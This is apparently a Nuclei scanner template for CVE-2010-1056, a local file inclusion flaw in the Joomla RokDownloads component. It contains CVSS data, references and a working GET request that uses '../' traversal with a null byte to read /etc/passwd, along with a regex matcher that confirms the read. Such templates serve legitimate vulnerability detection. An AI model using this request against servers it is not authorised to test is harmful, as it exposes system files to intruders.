id: CVE-2010-1056 info: name: Joomla! Component com_rokdownloads - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11760 - https://nvd.nist.gov/vuln/detail/CVE-2010-1056 - http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released - https://exchange.xforce.ibmcloud.com/vulnerabilities/56898 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1056 cwe-id: CWE-22 epss-score: 0.06484 epss-percentile: 0.93019 cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rockettheme product: com_rokdownloads tags: cve,cve2010,joomla,lfi,edb,rockettheme http: - method: GET path: - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502206f23347fc78c49c9e4569468806b46c1f3a0a646c189a57c6e021e848668bc52022100d08e6c11bd627fc6eb6668dd39684ae70f76f50186063a230f92a15306a6dafe:922c64590222798bb761d5b6d8e72950